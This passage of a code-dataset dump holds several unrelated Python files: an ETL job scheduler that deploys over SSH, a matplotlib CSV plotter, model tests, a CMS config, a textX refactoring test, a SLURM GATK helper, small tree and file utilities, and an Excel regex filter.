s.tb_name=e.tb_name \n and e.oper_date=CURRENT_DATE() and e.job_type='hive'\n where del_flag=0 and freq_type='{0}'\n \"\"\"\n job_group=pd.read_sql(sql_txt.format(self.frency),engine,index_col='tb_name')\n sql_txt=\"\"\"\n SELECT group_id,max(rank_id) max_rank_id\n FROM job_group_set where freq_type='{0}' group by group_id order by group_id\n \"\"\" #,index_col='group_id'\n group_max_rank_id=pd.read_sql(sql_txt.format(self.frency),engine)\n return job_group.to_dict(),group_max_rank_id\n def get_group_usedtime(self): #获取作业用时情况,分组用时情况\n engine=conn.sljr_pg()\n sql_txt=\"\"\"\n select \n case when batch_type='hive' then batch_name||'.sql' else batch_name end batch_name,\n avg(EXTRACT(EPOCH FROM (enddate-begindate))) used_time\n from \n dc_stging.sljr_hive_batch_log \n where create_time>CURRENT_TIMESTAMP - interval '10 day' \n and error='success' \n GROUP BY case when batch_type='hive' then batch_name||'.sql' else batch_name end\n \"\"\"\n job_time=pd.read_sql(sql_txt,engine,index_col='batch_name')\n engine=conn.meta('etl_data')\n sql_txt=\"\"\"\n SELECT tb_name,sql_file,group_id,freq_type,depend\n FROM job_group_set where del_flag=0 and freq_type='{0}'\n \"\"\"\n job_group=pd.read_sql(sql_txt.format(self.frency),engine,index_col='tb_name')\n if job_group.shape[0]>0:\n job_group=job_group.merge(job_time,how='left',left_on='sql_file',right_index=True)\n job_group=job_group.fillna(job_group['used_time'].mean())\n job_group=job_group.groupby('group_id')['used_time'].sum()\n return job_group.to_dict(),job_time.to_dict()['used_time']\n else:\n group_used_time={}\n for i in range(self.group_num):\n group_used_time[i+1]=0\n return group_used_time,job_time.to_dict()['used_time'] \n def group_sh(self):\n group_sh={}\n group_sql={}\n for i in range(self.group_num):\n group_file=self.group_name+str(i+1).zfill(2)+'.sh'\n filepath=confs.main_path_bin+group_file\n open(filepath, \"wb\").write(open(confs.main_path+'bin/template.sh', \"rb\").read())\n group_sh[i+1]=group_file\n group_sql[i+1]=[]\n return group_sh, group_sql\n \n def dict_sort_by_value(self,d,desc=False): # 数据字典key值按value排序\n items=d.items() \n backitems=[[v[1],v[0]] for v in items] \n backitems.sort(reverse=desc) #reverse=True\n #print(type(backitems))\n #backitems2=[[v[1],v[0]] for v in backitems] \n return [backitems[i][1] for i in range(0,len(backitems))] \n def re_set_all(self,group_num_new=0): #重置所有分组\n if group_num_new<3:\n print('group_num分组数太少,应该在4组以上')\n return 0\n else:\n self.group_num=group_num_new\n gp_map,gp_sql=self.group_sh()\n jobs_dict,group_max_rank_id=self.get_job_group()\n tb_sql_map=jobs_dict['sql_file']\n tb_dep_map=jobs_dict['depend']\n group_usedtime,sql_usedtime=self.get_group_usedtime()\n has_dep_tbs={}\n tb_gp_map={} #表分组 \n no_dep_tbs={} #特殊表提前执行\n for tb in tb_sql_map.keys():\n depd=eval(tb_dep_map[tb]) #依赖的表\n #tb_dep_map[tb]=depd\n new_depd=depd.copy() #将依赖表另存一份\n for tp in depd: #去除依赖sdd的表\n if tp[0:4] in confs.db_map.keys():\n new_depd.remove(tp)\n if tp in specia_list:\n new_depd.remove(tp)\n if len(new_depd)>0:\n has_dep_tbs[tb]=new_depd\n else :\n if tb in specia_list:\n no_dep_tbs[tb]=0 #特殊表加长时间以便使其放在首位\n else:\n tb_sql=tb_sql_map[tb]\n if tb_sql in sql_usedtime.keys(): #有执行历史记录的以历史用时为准\n no_dep_tbs[tb]=sql_usedtime[tb_sql]\n else:\n no_dep_tbs[tb]=99999\n no_dep_tbs=self.dict_sort_by_value(no_dep_tbs) \n for i in range(len(no_dep_tbs)):\n tp=i%self.group_num+1\n gp_sql[tp].append(no_dep_tbs[i])\n tb_gp_map[no_dep_tbs[i]]=tp\n for tb in has_dep_tbs.keys():\n max_num=0\n for tp in has_dep_tbs[tb]:\n if tp in tb_gp_map.keys():\n tp_max_num=tb_gp_map[tp]\n if tp_max_num>max_num:\n max_num=tp_max_num\n else :\n print(tp,'依赖表没有加入配置')\n return 0\n if max_num>0:\n if tb in tb_gp_map.keys():\n print(tb,'已经存在')\n return 0\n else:\n gp_sql[max_num].append(tb)\n tb_gp_map[tb]=max_num\n etl_data=conn.meta('etl_data')\n sql=\"\"\"insert into job_group_set_his(tb_name,sql_file,group_id,depend,rank_id,create_time,update_time,freq_type,del_flag,cmds,oper_time)\n select tb_name,sql_file,group_id,depend,rank_id,create_time,update_time,freq_type,del_flag,cmds,CURRENT_TIMESTAMP() from job_group_set;\n delete from job_group_set where freq_type='{0}';\"\"\"\n etl_data.execute(sql.format(self.frency))\n sql=\"insert into job_group_set(tb_name,sql_file,depend,freq_type,group_id,rank_id,cmds) VALUES('{0}','{1}','{2}','{3}',{4},{5},'{6}')\"\n for tb in gp_sql.keys():\n tb_list=gp_sql[tb]\n for i in range(len(tb_list)):\n etl_data.execute(sql.format(tb_list[i],tb_sql_map[tb_list[i]],pymysql.escape_string(str(tb_dep_map[tb_list[i]])),self.frency,tb,i,confs.hive_sh+tb_sql_map[tb_list[i]]))\n return 1\n \n def del_job(self,tb_name): # 删除作业\n jobs_dict,group_max_rank_id=self.get_job_group()\n tb_dep_map=jobs_dict['depend']\n tb_sql_map=jobs_dict['sql_file']\n if tb_name in tb_sql_map.keys():\n sql_file=tb_sql_map[tb_name]\n for tp in tb_dep_map.keys():\n if tb_name in tb_dep_map[tp]:\n print(tp,'依赖',tb_name,'不能删除')\n return 0\n sql=\"update job_group_set set del_flag=1 where sql_file='{0}' and freq_type='{1}';\".format(sql_file,self.frency)\n etl_data=conn.meta('etl_data')\n etl_data.execute(sql)\n self.write_sh()\n return 1\n else:\n print(tb_name,'没有部署,无法删除')\n return 0\n def add_job(self,sql_file,tb_name,depd_list): # 新增作业\n group_usedtime,sql_usedtime=self.get_group_usedtime()\n jobs_dict,group_max_rank_id=self.get_job_group() # 已经配置好的\n #print(group_max_rank_id)\n tb_group_map=jobs_dict['group_id']\n tb_dep_map=jobs_dict['depend']\n if tb_name in tb_dep_map or sql_file in jobs_dict['sql_file'].keys():\n print(tb_name,'已经部署,不能不能重复部署')\n return 0\n else:\n new_depd=depd_list.copy() #将依赖表另存一份\n for tp in depd_list: #去除依赖sdd的表\n if tp[0:4] in confs.db_map.keys():\n new_depd.remove(tp)\n if tp in specia_list:\n new_depd.remove(tp)\n if len(new_depd)>0: #有依赖\n dep_group={}\n for tb in new_depd:\n if tb in tb_group_map.keys():\n group_id=tb_group_map[tb]\n dep_group[group_id]=group_usedtime[group_id]\n else:\n print(tb,'依赖表没有加入配置')\n return 0\n group_id=self.dict_sort_by_value(dep_group)[0] \n #rank_id=group_max_rank_id.loc[group_id-1,'max_rank_id']+1 \n else: #无依赖\n group_id=self.dict_sort_by_value(group_usedtime)[0]\n rank_id=group_max_rank_id.loc[group_id-1,'max_rank_id']+1\n sql=\"insert into job_group_set(tb_name,sql_file,depend,freq_type,group_id,rank_id,cmds) VALUES('{0}','{1}','{2}','{3}',{4},{5},'{6}')\"\n etl_data=conn.meta('etl_data')\n etl_data.execute(sql.format(tb_name,sql_file,pymysql.escape_string(str(depd_list)),self.frency,group_id,rank_id,confs.hive_sh+sql_file))\n return 1\n def write_sh(self,group_id=0): #指定groupid则只更新group_id的分组\n engine=conn.meta('etl_data')\n sshcon=ssh_con()\n ssh_uat=ssh_cmd(sshcon.ssh_uat)\n ssh_sc=ssh_cmd(sshcon.ssh_sc)\n sql_txt=\"\"\"\n SELECT group_id,sql_file,cmds\n FROM job_group_set where del_flag=0 and freq_type='{0}'\n order by group_id,rank_id\n \"\"\"\n job_group=pd.read_sql(sql_txt.format(self.frency),engine)\n #if group_id<1 or group_id>self.group_num: \n gp_map,gp_sql=self.group_sh() #将文件清空\n for i in gp_map.keys():\n filepath=confs.main_path_bin+gp_map[i]\n f=open(filepath, 'a',encoding='utf-8') #打开文件\n tp=list(job_group[job_group['group_id']==i]['cmds'])\n for sqls in tp:\n f.write(sqls)\n f.write(\"\\n\")\n f.close()\n ssh_uat.upload(filepath,confs.remote_path_bin+gp_map[i])\n ssh_sc.upload(filepath,confs.remote_path_bin+gp_map[i])\n ssh_uat.cmd_run(['chmod 755 -R /home/bigdata/bin /home/bigdata/sql /home/bigdata/cfg'])\n ssh_sc.cmd_run(['chmod 755 -R /home/bigdata/bin /home/bigdata/sql /home/bigdata/cfg'])\n ssh_uat.close()\n ssh_sc.close()\n return 1\n def is_utf8_file(self,filepath): #是否utf8,但是有bom和无bom无法区别\n try:\n f=open(filepath,'r',encoding='utf-8')\n f.read()\n f.close()\n return 1\n except Exception as e:\n f.close()\n return 0\n def read_deploy(self):\n #判断表存在、文件存在、依赖、是否sqoop判断\n filepath=confs.main_path+'deploy_file.properties'\n tb_list=set()\n with open(filepath, 'r') as f:\n lines = f.readlines() #读取所有行\n for line in lines:\n tp=line.replace('.sql','').replace('.sh','').replace('.properties','').replace(',','')\n if len(tp)>4:\n tb_list.add(tp.strip())\n f.close()\n #print(tb_list)\n return list(tb_list)\n \n def check_deploy(self,tb): #文件检测\n if not os.path.exists(confs.main_path+'sql/'+tb+'.sql'):\n print(tb+'.sql','文件不存在')\n return 0,'null','null'\n else:\n sql_tb,sql_tb_cn,sql_author=self.read_sqlfile(tb+'.sql')\n if self.is_utf8_file(confs.main_path+'sql/'+tb+'.sql')==0:\n print(tb+'.sql','不是UTF-8格式')\n return 0,'null','null'\n if os.path.exists(confs.main_path+'cfg/'+tb+'.properties'):\n if self.is_utf8_file(confs.main_path+'cfg/'+tb+'.properties')==0:\n print(tb+'.properties','不是UTF-8格式')\n return 0,'null','null'\n keys=''\n values=[]\n with open(confs.main_path+'cfg/'+tb+'.properties', 'r',encoding='utf-8') as f: #打开文件\n lines = f.readlines() #读取所有行\n file_rs={}\n for line in lines:\n line=line.strip()\n if len(line)>1 and not line.startswith('#'):\n if '[' in line:\n if len(keys)>1:\n file_rs[keys]=values\n keys=line\n values=[]\n else:\n if line not in['@DAILY']:\n values.append(line)\n #print(file_rs['[results]'])\n if len(file_rs['[results]'])==1:\n tar_tb=file_rs['[results]'][0]\n if conn.hive_tb_exists(tar_tb)==0:\n print('hive不存目标表:',tar_tb)\n #return 0,'null'\n if not tar_tb==sql_tb:\n print('properties文件【result】表名称和目标表不一致',tar_tb,sql_tb)\n return 0,'null','null'\n else:\n print('properties文件【result】没有指定生成结果文件名或者指定多个结果')\n return 0,'null'\n if len(file_rs['[dependence]'])>0:\n for tp in file_rs['[dependence]']:\n #检查依赖表的配置情况\n if conn.etl_set_exists(tp)==0:\n print(tp,'依赖配置没有加入调度')\n return 0,'null','null'\n #print(tp)\n else:\n print('properties文件【dependcy】没有指定依赖文件') \n return 0,'null','null'\n if len(file_rs['[properties]'])>0:\n for tp in file_rs['[properties]']:\n if 'dev' in tp:\n print('dev不应该出现在配置文件的[properties]中')\n return 0,'null','null'\n else:\n print('properties文件【properties】配置正确') \n return 0,'null','null'\n else:\n print(tb+'.properties','文件不存在')\n return 0,'null','null'\n return 1,tar_tb,file_rs['[dependence]']\n \n def read_sqlfile(self,file_name):\n filepath=confs.main_path_sql+file_name\n target_tb_cn=''\n target_tb=''\n create_by=''\n if os.path.exists(filepath):\n try:\n #print(files)\n if os.path.isfile(filepath) and file_name.endswith('.sql'):\n with open(filepath, 'r',encoding='utf-8') as f: #打开文件\n lines = f.readlines() #读取所有行\n target_tb_cn=''\n create_by=''\n for line in lines[0:15]:\n line=line.strip()\n if 'see:' in line:\n target_tb_cn=line[line.find(':')+1:].strip()\n if '}.' in line:\n target_tb=line[line.find('}.')+2:].strip()\n target_tb=target_tb.replace('(','').replace(' ','')\n if 'author:' in line:\n create_by=line[line.find(':')+1:].strip()\n #tables_list.loc[nums]=[files,target_tb_cn,create_by]\n except Exception as e:\n #print('str(Exception):\\t', str(Exception))\n print (file_name,'\\t error :\\t\\t',str(e)) \n return target_tb,target_tb_cn,create_by\n else:\n print(file_name,'文件不存在') \n return target_tb,target_tb_cn,create_by \n def sdd_table(self,db,tb_list):#uat和生产环境同步建SDD表\n sshcon=ssh_con()\n ssh=ssh_cmd(sshcon.ssh_uat)\n is_success=ssh.hive_ddl(db,tb_list)\n if is_success>0:\n ssh=ssh_cmd(sshcon.ssh_sc)\n ssh.hive_ddl(db,tb_list)\n ssh.close() \n def append_sh(self,filepath,tar_cmd):\n if filepath.endswith('.sh') :\n if not os.path.exists(filepath):\n #print(confs.main_path+'bin/template.sh',os.path.exists(confs.main_path+'bin/template.sh'))\n open(filepath, \"wb\").write(open(confs.main_path+'bin/template.sh', \"rb\").read())\n with open(filepath, 'r',encoding='utf-8') as fr:\n for tp in fr.readlines():\n if tar_cmd in tp:\n print('分组文件已经添加shell命令不能重复配置')\n return 1\n fr.close()\n with open(filepath, 'a',encoding='utf-8') as f: #打开文件\n f.write(tar_cmd)\n f.write(\"\\n\")\n f.close()\n \n with open(filepath, 'r',encoding='utf-8') as fr:\n for tp in fr.readlines():\n if tar_cmd.endswith('.sql'):\n if len(tp)>160:\n print(filepath,'文件配置错位')\n return 0\n else:\n if len(tp)>100:\n print(filepath,'文件配置错位')\n return 0\n fr.close()\n else:\n print('无效文件,必须是.sh文件') \n return 1 \n def auto_deploy(self,tar_ssh='ssh_uat'): \n tb_list=self.read_deploy()\n print(tb_list)\n sshcon=ssh_con()\n #ssh=ssh_cmd(sshcon.ssh_uat)\n if tar_ssh=='ssh_sc':\n self.ssh=ssh_cmd(sshcon.ssh_sc)\n ssh=self.ssh\n for tb in tb_list:\n heads=tb[0:4]\n if heads in confs.db_map.keys():\n print('\\n sqoop同步配置:',tb)\n tp_tb=tb[5:]\n tar_cmd=heads+' '+tp_tb+' auto'\n tb_size=conn.sljr_tb_size(db=heads,tb=tp_tb)\n if conn.etl_set_exists(tb)>0:\n print(tb,'目标表已经加入了调度,如果需要重新调度请手动修改')\n break\n if tb_size<0:\n print(tp_tb,'表不存在不能同步,或者检查表名')\n break\n if tb_size>10000000:\n print(tp_tb,'大于1千万需要增量同步:',tb_size)\n tar_cmd=tar_cmd+' inc'\n if conn.hive_tb_exists(tb)==0:\n self.sdd_table(db=heads,tb_list=[tp_tb]) #同步表结构\n group_sh=confs.local_path+'bin/sqoop_'+heads+'.sh'\n tar_cmd=confs.sqoop_sh+tar_cmd\n if self.append_sh(group_sh,tar_cmd)>0: \n if ssh.cmd_run([tar_cmd])>0:\n ssh.upload(group_sh,confs.remote_path+'bin/sqoop_'+heads+'.sh')\n else:\n print(heads,'shell文件配置错位')\n break\n else:\n #hive sql配置\n print('\\n hive sql同步配置检测:',tb)\n flag,tar_tb,depd_list=self.check_deploy(tb)\n if flag==0:\n print('\\033[1;37;45m ERROR:',tb,' 配置文件检查错误 \\033[0m')\n break\n else:\n print('检测通过:',tb)\n ssh.upload(confs.main_path+'cfg/'+tb+'.properties',confs.remote_path+'cfg/'+tb+'.properties')\n ssh.upload(confs.main_path+'sql/'+tb+'.sql',confs.remote_path+'sql/'+tb+'.sql')\n #ssh.upload(confs.main_path+'bin/'+tb+'.sh',confs.remote_path+'bin/'+tb+'.sh')\n tar_cmd=confs.hive_sh+tb+'.sql'\n #print('执行数据同步完成')\n if ssh.cmd_run([tar_cmd])>0:\n if self.add_job(tb+'.sql',tar_tb,depd_list)>0:\n self.write_sh()\n else:\n #self.write_sh()\n print('\\033[1;37;45m ERROR:',tb,' sql执行错误,请修改 \\033[0m')\n\n ssh.cmd_run(['chmod 755 -R /home/bigdata/bin /home/bigdata/sql /home/bigdata/cfg'])\n ssh.close()\n def run_sql(self,tb,tar_ssh='ssh_uat'): \n sshcon=ssh_con()\n ssh=ssh_cmd(sshcon.ssh_uat)\n if tar_ssh=='ssh_sc':\n ssh=ssh_cmd(sshcon.ssh_sc)\n flag,tar_tb,depd_list=self.check_deploy(tb)\n if flag==0:\n print('\\033[1;37;45m ERROR:',tb,' 配置文件检查错误 \\033[0m')\n else:\n print('检测通过:',tb)\n ssh.upload(confs.main_path+'cfg/'+tb+'.properties',confs.remote_path+'cfg/'+tb+'.properties')\n ssh.upload(confs.main_path+'sql/'+tb+'.sql',confs.remote_path+'sql/'+tb+'.sql')\n tar_cmd=confs.hive_sh+tb+'.sql'\n #print('执行数据同步完成')\n if ssh.cmd_run([tar_cmd])>0:\n print('执行成功')\n else:\n print('\\033[1;37;45m ERROR:',tb,' sql执行错误,请修改 \\033[0m')\n ssh.close() \nif __name__ == '__main__': \n auto=auto_schedule()\n auto.auto_deploy(tar_ssh='ssh_sc')\n #auto.run_sql(tb='dim_cust_base_info_daily',tar_ssh='ssh_sc')\n ","sub_path":"myworks/auto_schedule.py","file_name":"auto_schedule.py","file_ext":"py","file_size_in_byte":22945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"58470930","text":"## -*- coding: utf-8 -*-\n#\"\"\"\n#Spyder Editor\n#\n#This is a temporary script file.\n#\"\"\"\n#\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport csv\n#from csvGenerator import update\nimport itertools\n#from client import fnamedump\n\n#style.use('fivethirteight')\nSTEP = 100\nfig = plt.figure()\nax1 = fig.add_subplot(1,1,1)\n#ax1.set_aspect('equal', 'datalim')\nax1.set_xlabel('Time Stamp')\nax1.set_ylabel('Current (mA)')\n\nbegin = 5\nend = STEP\n\ndef readRow():\n \n global begin, end\n \n with open('teststand_2016-09-27T14-29-28.693000.csv', 'r') as csvfile:\n reader = csv.reader(csvfile, delimiter=';')\n x = []\n y = []\n for row in itertools.islice(reader, begin, end):\n x.append(float(row[0]) / 1000.0)\n y.append(row[25])\n \n begin = reader.line_num - 1\n end = begin + STEP\n \n return x, y \n\ndef animate(i):\n \n x, y = readRow()\n ax1.plot(x, y, 'r-')\n\n# x,y = update()\n# ax1.plot(x, y, 'r-')\n\nif __name__=='__main__':\n \n# try:\n# while True:\n# x,y = update()\n# print(x)\n# except KeyboardInterrupt: \n# pass\n \n ani = animation.FuncAnimation(fig, animate, interval=1000)\n plt.show()","sub_path":"plot/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"34338791","text":"from .. import models\n\n\nclass TestModels:\n\n def test_tweet_object_id_content(self, db_session):\n tweet = models.Tweet(content=\"Test content\")\n db_session.add(tweet)\n db_session.commit()\n assert str(tweet) == \"{0}. {1}\".format(1, \"Test content\")\n\n def test_tag_object_id_tagname(self, db_session):\n tag = models.Tag(tag=\"test_tag\")\n db_session.add(tag)\n db_session.commit()\n assert str(tag) == \"{0}. {1}\".format(1, \"test_tag\")\n","sub_path":"grpc_service/database/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"430555553","text":"import os\nimport FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"HFA\")\n\n# ----------------------------------------------------------------------\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.threshold = 'INFO'\n#process.MessageLogger.cerr.FwkReport.reportEvery = 1000\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 1\nprocess.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True) )\n\n\n# ----------------------------------------------------------------------\n# -- Database configuration\nprocess.load(\"CondCore.DBCommon.CondDBCommon_cfi\")\nprocess.load(\"CondCore.DBCommon.CondDBSetup_cfi\")\n\n# -- Conditions\nprocess.load(\"Configuration.StandardSequences.MagneticField_38T_cff\")\nprocess.load(\"Configuration.Geometry.GeometryIdeal_cff\")\nprocess.load(\"RecoVertex.BeamSpotProducer.BeamSpot_cfi\")\nprocess.load(\"Configuration.StandardSequences.FrontierConditions_GlobalTag_cff\")\nprocess.GlobalTag.globaltag = \"GR_P_V43D::All\"\n\n# ----------------------------------------------------------------------\n# -- Input files\n\nprocess.source = cms.Source(\"PoolSource\",\n skipEvents = cms.untracked.uint32(0),\n fileNames = cms.untracked.vstring(\n 'file:/usr/rmt_share/scratch96/w/wxie/2A54599E-DB74-E211-9D29-5404A63886AD.root'\n )\n )\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(1000)\n )\n\nrootFileName = \"dpm.root\"\n\nprocess.tree = cms.EDAnalyzer(\n \"HFTree\",\n verbose = cms.untracked.int32(1),\n printFrequency = cms.untracked.int32(1000),\n fileName = cms.untracked.string(rootFileName),\n requireCand = cms.untracked.bool(True)\n )\n\n# ----------------------------------------------------------------------\nprocess.load(\"Configuration.StandardSequences.Reconstruction_cff\")\nprocess.load(\"UserCode.OpenHF.HFRecoStuff_cff\")\nprocess.load(\"UserCode.OpenHF.HFCharm_cff\")\n\n# ----------------------------------------------------------------------\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string('dpm.root')\n )\n\n# ----------------------------------------------------------------------\nprocess.p = cms.Path(\n process.recoStuffSequence*\n process.dpmSequence*\n process.tree\n)\n\n","sub_path":"OpenHF/test/dpm.py","file_name":"dpm.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"652575899","text":"import os\nfrom os.path import dirname\nfrom textx import metamodel_from_file\nfrom textx.export import metamodel_export, model_export\nfrom textx.model import pprint_tree\nfrom drawingPrinter import init_drawing_printer\n\nTHIS_FOLDER = dirname(__file__)\n\ndef main(debug=False):\n mm = metamodel_from_file('drawing.tx', debug=debug)\n proba_model = mm.model_from_file('drawingExample.txt')\n export_dot(mm, proba_model)\n\n print('\\n\\nORIGINAL:\\n\\n')\n printer = init_drawing_printer()\n printer.pprint_model(proba_model)\n\n # refactor_model_extract_method(proba_model, mm)\n # refactor_model_change_order(proba_model)\n\n # print('\\n\\nREFACTORED:\\n\\n')\n # printer.pprint_model(proba_model)\n\ndef refactor_model_change_order(model):\n model.functions.reverse()\n model._tx_pprint_data.reverse()\n\ndef refactor_model_extract_method(model, metamodel):\n existing_function = model.functions[0]\n \n # Create a new Function instance\n function_metaclass = existing_function.__class__\n new_function = function_metaclass.__new__(function_metaclass)\n metamodel._init_obj_attrs(new_function)\n \n # Set a name and arguments for the new function\n new_function.args = ['x', 'y', 'radius1', 'radius2']\n new_function.name = 'print_circles'\n\n # Add 2 statements from the existing function to the new function\n new_function.statements = [existing_function.statements[4], existing_function.statements[5]]\n\n # Add the new function to the model\n model.functions.append(new_function)\n model._tx_pprint_data.append(new_function)\n\n # Create a function call for the new function\n function_call_metaclass = metamodel.__getitem__('FunctionCall')\n new_function_call = function_call_metaclass.__new__(function_call_metaclass)\n metamodel._init_obj_attrs(new_function_call)\n\n new_function_call.name = new_function.name\n new_function_call.args = new_function.args\n new_function_call.whitespaces_before = existing_function._tx_pprint_data[16]._tx_pprint_data[0].layout_before\n\n # Remove the statements from the existing function and replace them with the function call\n existing_function.statements[4] = new_function_call\n existing_function.statements.pop(5)\n existing_function._tx_pprint_data.pop(16)\n existing_function._tx_pprint_data.pop(16)\n existing_function._tx_pprint_data.pop(16)\n existing_function._tx_pprint_data.insert(16, new_function_call)\n\n\ndef export_dot(mm, model):\n metamodel_export(mm, 'metamodel.dot')\n model_export(model, 'model.dot')\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"drawing/drawingTest.py","file_name":"drawingTest.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"358672159","text":"### FIX\n# at some point, have the jobID/mem as an input arg instead of scripted\n###\n\n###\n# usage: gvcf_helper.py /path/to/fastq.gz/folder/\n\n###\n# purpose: to keep running gatk commands until time or memory runs out\n###\n\n### imports\nimport sys\nimport os\nfrom os import path as op\nfrom os import listdir\nimport pickle\nimport shutil\nfrom random import shuffle\ndef ls(DIR):\n return sorted([f for f in listdir(DIR)])\ndef fs (DIR):\n return sorted([op.join(DIR,f) for f in ls(DIR)])\n###\n\n### args\nthisfile, fqdir = sys.argv\n###\n\nos.system('source $HOME/.bashrc')\nDIR = op.join(op.dirname(fqdir),'shfiles/gvcf_shfiles')\nos.chdir(DIR)\nworkingdir = op.join(DIR,'workingdir')\nif not op.exists(workingdir):\n os.makedirs(workingdir)\n \n# get job info and current memory/time limits\njobid = os.popen('echo ${SLURM_JOB_ID}').read().replace(\"\\n\",\"\")\n#print('jobid=',jobid)\njobinfo = os.popen(\"sacct -j %s | grep 'lindb'\" % jobid).read()\n#print('jobinfo=',jobinfo)\njobmem = int([x for x in jobinfo.split() if 'mem' in x][0].split(\",\")[1].split('=')[1].replace(\"M\",\"\"))\n#print('jobmem=',jobmem)\ntimeinfo = os.popen(\"sacct -j %s --format Timelimit\" % jobid).read()\n#print('timeinfo=',timeinfo)\njobtime = int(timeinfo.split()[-1].split(':')[0])\n#print('jobtime=',jobtime)\n\n# get list of remaining gatk calls\nshfiles = [f for f in fs(DIR) if f.endswith('.sh')]\nshuffle(shfiles) \n\n# run commands until I run out of time\nos.system('echo running gvcf_helper.py')\nif len(shfiles) > 0:\n for s in shfiles:\n # print (s)\n reservation = op.join(workingdir,op.basename(s))\n if op.exists(s):\n try:\n shutil.move(s,reservation) # so that other jobs don't rewrite\n except:\n os.system('echo could not move shfile %s' % s)\n os.system('echo to reservation %s' % reservation)\n continue\n os.system('echo %s' % reservation)\n \n with open(reservation,'r') as O:\n o = O.readlines()\n\n # only continue to run jobs that fit in the same memory allocation (dont waste resources if its going to fail)\n mem = int([x for x in o if 'mem' in x][0].split(\"=\")[1].replace(\"M\\n\",\"\"))\n if mem > jobmem:\n os.system('echo file exceeds mem limit')\n shutil.move(reservation,s) # put the job back in the queue\n continue\n # only continue to run jobs that might fit in same time allocation\n TIME = int([x for x in o if 'time' in x][0].split(\"=\")[1].split(':')[0])\n if TIME > jobtime:\n os.system('echo file exceeds necessary time')\n shutil.move(reservation,s)\n continue\n\n\n os.system('echo file is ok to proceed')\n for line in o:\n if line.startswith('gatk'):\n cmd = line.replace('\\n','')\n os.system('echo running cmd:')\n os.system('echo %s' % cmd)\n os.system('%s' % cmd)\n try:\n os.unlink(reservation)\n os.system('echo unlinked shfile %s' % reservation)\n except:\n os.system('echo unable to unlink %s' % reservation)\n pass\n pipedir = os.popen('echo $HOME/pipeline').read().replace(\"\\n\",\"\")\n os.system('python %s %s' % (op.join(pipedir,'rescheduler.py'),\n fqdir))\n os.system('python %s %s' % (op.join(pipedir,'scheduler.py'),\n fqdir))\n\n break\nelse:\n os.system('echo no files to help')\n \n \n \n ","sub_path":"pipeline/gvcf_helper.py","file_name":"gvcf_helper.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"298953417","text":"class Node:\n def __init__(self, val):\n self.key = val\n self.left = None\n self.right = None\n\n\ndef print_tree(node):\n if node is None:\n return\n print_tree(node.left)\n print(node.key)\n print_tree(node.right)\n\n\ndef main():\n root = Node(18)\n root.left = Node(12)\n root.left.left = Node(7)\n root.left.right = Node(4)\n root.left.right.left = Node(5)\n root.right = Node(10)\n root.right.left = Node(2)\n root.right.right = Node(21)\n print_tree(root)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"10_4_2_print_tree_recursive.py","file_name":"10_4_2_print_tree_recursive.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"235208136","text":"def file_write(file_path, data):\n \"\"\"\n Write data in the file specified at file_path\n\n :param file_path: the location of the file\n :param data: the data to write\n :return: nothing\n \"\"\"\n with open(file_path, 'w') as output_file:\n if not isinstance(data, str):\n data = str(data)\n output_file.write(data.encode())\n return\n","sub_path":"algorithms/file/write.py","file_name":"write.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"268878208","text":"import re\nimport sys\nfrom datetime import date\nfrom xlrd import open_workbook,xldate_as_tuple\nfrom xlwt import Workbook\ninput_file = sys.argv[1] # 此处为 sales_2013.xlsx\noutput_file = sys.argv[2] # 此处为 6output.xls\noutput_workbook = Workbook()\noutput_worksheet = output_workbook.add_sheet('jan_2013_output')\npattern = re.compile(r'(?P^J.*)') # 这段文字中 ^J.* 是最重要的,意为从开头进行匹配,J后面可跟任意多个字符\ncustomer_name_column_index = 1\n\"\"\"\n以下代码的逻辑与之前很类似,一样是打开文件,逐个单元格查看,如果满足要求,就将此行数据提出\n\"\"\"\nwith open_workbook(input_file) as workbook:\n\tworksheet = workbook.sheet_by_name('january_2013')\n\tdata = []\n\theader = worksheet.row_values(0)\n\tdata.append(header)\n\tfor row_index in range(1,worksheet.nrows):\n\t\trow_list = []\n\t\tif pattern.search(worksheet.cell_value(row_index, customer_name_column_index)):\n\t\t\tfor column_index in range(worksheet.ncols):\n\t\t\t\tcell_value = worksheet.cell_value(row_index, column_index)\n\t\t\t\tcell_type = worksheet.cell_type(row_index, column_index)\n\t\t\t\tif cell_type == 3:\n\t\t\t\t\tdate_cell = xldate_as_tuple(cell_value, workbook.datemode)\n\t\t\t\t\tdate_cell = date(*date_cell[0:3]).strftime('%m/%d/%Y')\n\t\t\t\t\trow_list.append(date_cell)\n\t\t\t\telse:\n\t\t\t\t\trow_list.append(cell_value)\n\t\tif row_list:\n\t\t\tdata.append(row_list)\n\tfor list_index,output_list in enumerate(data):\n\t\tfor element_index,element in enumerate(output_list):\n\t\t\toutput_worksheet.write(list_index,element_index,element)\noutput_workbook.save(output_file)","sub_path":"第 3 